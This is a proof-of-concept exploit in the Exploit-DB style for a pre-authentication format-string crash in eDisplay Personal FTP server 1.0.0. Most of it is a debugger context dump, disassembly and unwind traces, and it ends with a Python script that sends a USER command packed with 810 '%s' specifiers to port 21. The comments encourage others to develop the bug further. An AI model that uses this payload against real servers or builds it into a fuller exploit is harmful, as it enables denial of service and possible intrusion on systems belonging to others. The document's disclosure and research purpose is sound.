# Title: eDisplay Personal FTP server 1.0.0 Pre-Authentication Crash (PoC) # From: The eh?-Team || The Great White Fuzz (we're not sure yet) # Found by: loneferret # Hat's off to dookie2000ca # Disvovery date: 16/03/2010 # Software link: http://edisplay-personal-ftp-server.software.informer.com/ # Tested on: Windows XP SP3 Professional # Nod to the Exploit-DB Team # Vendor informed via email : 17/03/2010 #!/usr/bin/python #Pre-Authentication crash #1 #I say crash number 1 since there's another instance where it crashes with the USER command. #Also many post-authentication commands also crash with the same buffer type (%n for example) #with variant degrees of interesting CPU registry overwrites. #It will crash if you send it about 40 '%s' really, but I've included my full session of 810 bytes sent. #As always, if anyone wants to take this further go right ahead. Just be nice and don't forget who found it. #CONTEXT DUMP # EIP: 7e4287aa mov dl,[eax] # EAX: 73736150 (1936941392) -> N/A # EBX: 0000000a ( 10) -> N/A # ECX: 73736150 (1936941392) -> N/A # EDX: 00000000 ( 0) -> N/A # EDI: 0012c9a6 ( 1231270) -> P(9d%s%s%s%s%s%s%s%s%s%s...%s%s%s%s%s%s%s%s%s%:UBsSHs%:vHEs<;T (stack) # ESI: 73736151 (1936941393) -> N/A # EBP: 0012c8e4 ( 1231076) -> P 9Hw331 Password required for Pthis control can act as an OLE drag/drop source, # and whether this process is started automatically # or under programmatic control.P(9d%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s (stack) # ESP: 0012c89c ( 1231004) -> 9HwC(J :^:{P 9Hw331 Password required for Pthis control can act as an OLE drag/drop source, and whether this process is started automatically or under programmatic (stack) # +00: 0139b8d0 ( 20560080) -> PWSOCK32.DLL (heap) # +04: 77124880 (1997686912) -> N/A # +08: 000000cd ( 205) -> N/A # +0c: 00000000 ( 0) -> N/A # +10: ffffffff (4294967295) -> N/A # +14: 00000000 ( 0) -> N/A #disasm around: # 0x7e428794 push eax # 0x7e428795 push byte 0x0 # 0x7e428797 push esi # 0x7e428798 lea eax,[ebp+0x8] # 0x7e42879b push eax # 0x7e42879c call [0x7e4114b8] # 0x7e4287a2 jmp 0x7e428747 # 0x7e4287a4 test eax,eax # 0x7e4287a6 jz 0x7e42875e # 0x7e4287a8 jmp 0x7e428747 # 0x7e4287aa mov dl,[eax] # 0x7e4287ac inc eax # 0x7e4287ad test dl,dl # 0x7e4287af jnz 0x7e4287aa # 0x7e4287b1 sub eax,esi # 0x7e4287b3 xor esi,esi # 0x7e4287b5 xor edx,edx # 0x7e4287b7 cmp [ebp-0x28],edx # 0x7e4287ba jnl 0x7e443411 # 0x7e4287c0 sub [ebp-0x18],eax # 0x7e4287c3 cmp esi,edx #stack unwind: # FtpServX.dll:50e0989b # FtpServX.dll:50e0a6d8 # FtpServX.dll:50e09d91 # USER32.dll:7e418734 # USER32.dll:7e418816 # USER32.dll:7e4189cd # USER32.dll:7e4196c7 # MSVBVM60.DLL:7342a6b0 # MSVBVM60.DLL:7342a627 # MSVBVM60.DLL:7342a505 #SEH unwind: # 0012fdf8 -> FtpServX.dll:50e1ceb4 mov eax,0x50e1fcf8 # 0012fe58 -> USER32.dll:7e44048f push ebp # 0012ffa8 -> USER32.dll:7e44048f push ebp # 0012ffe0 -> MSVBVM60.DLL:7350bafd push ebp # ffffffff -> kernel32.dll:7c839ac0 push ebp import socket buffer = ("%s") * 810 # \x25\x73 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect(('xxx.xxx.xxx.xxx',21)) s.recv(1024) s.send('USER '+buffer+'\r\n') s.recv(1024)